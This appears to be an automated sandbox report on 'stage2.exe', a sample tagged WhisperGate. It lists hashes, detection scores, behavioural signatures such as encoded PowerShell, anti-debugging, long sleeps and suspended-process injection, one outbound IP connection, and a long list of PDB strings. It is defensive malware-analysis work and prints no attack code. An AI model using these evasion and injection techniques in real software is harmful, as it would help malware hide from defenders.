Windows Analysis Report stage2.exe

Overview

General Information

Sample Name: stage2.exe
Analysis ID: 553986
MD5: 14c8482f302b5e81e3fa1b18a509289d
SHA1: 16525cb2fd86dce842107eb1ba6174b23f188537
SHA256: dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Tags: DEV-0586, exe, WhisperGate

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MSILDownloaderGeneric
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Execution of Powershell with Base64
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: stage2.exe Virustotal: Detection: 44%
Source: stage2.exe ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: stage2.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A341F0 CryptReleaseContext, 13_2_07A341F0

Compliance:

Uses 32bit PE files
Source: stage2.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: stage2.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
